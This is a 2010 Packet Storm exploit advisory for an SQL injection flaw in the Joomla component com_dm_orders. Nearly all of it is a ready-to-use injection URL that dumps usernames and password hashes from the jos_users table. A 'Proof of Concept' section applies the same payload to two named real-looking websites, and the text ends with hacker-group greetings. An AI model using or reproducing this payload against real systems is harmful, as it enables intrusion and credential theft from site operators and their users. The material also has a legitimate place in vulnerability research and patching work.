Joomla DM Orders SQL Injection

2010-01-07T00:00:00
ID PACKETSTORM:84898
Type packetstorm
Reporter NoGe
Modified 2010-01-07T00:00:00

Description

                                        
                                            `==============================================================================  
  
  
[o] Joomla Components [ com_dm_orders ] SQL Injection Vulnerability  
  
Software : com_dm_orders [ joomla components ]  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com/  
  
  
==============================================================================  
  
  
[o] Exploit  
  
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1  
  
  
  
[o] Proof of Concept  
  
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54  
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54  
  
  
==============================================================================  
  
  
[o] Greetz  
  
Anti Security [ http://antisecurity.org ]  
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe  
H312Y yooogy mousekill }^-^{ martfella noname s4va  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
==============================================================================  
  
`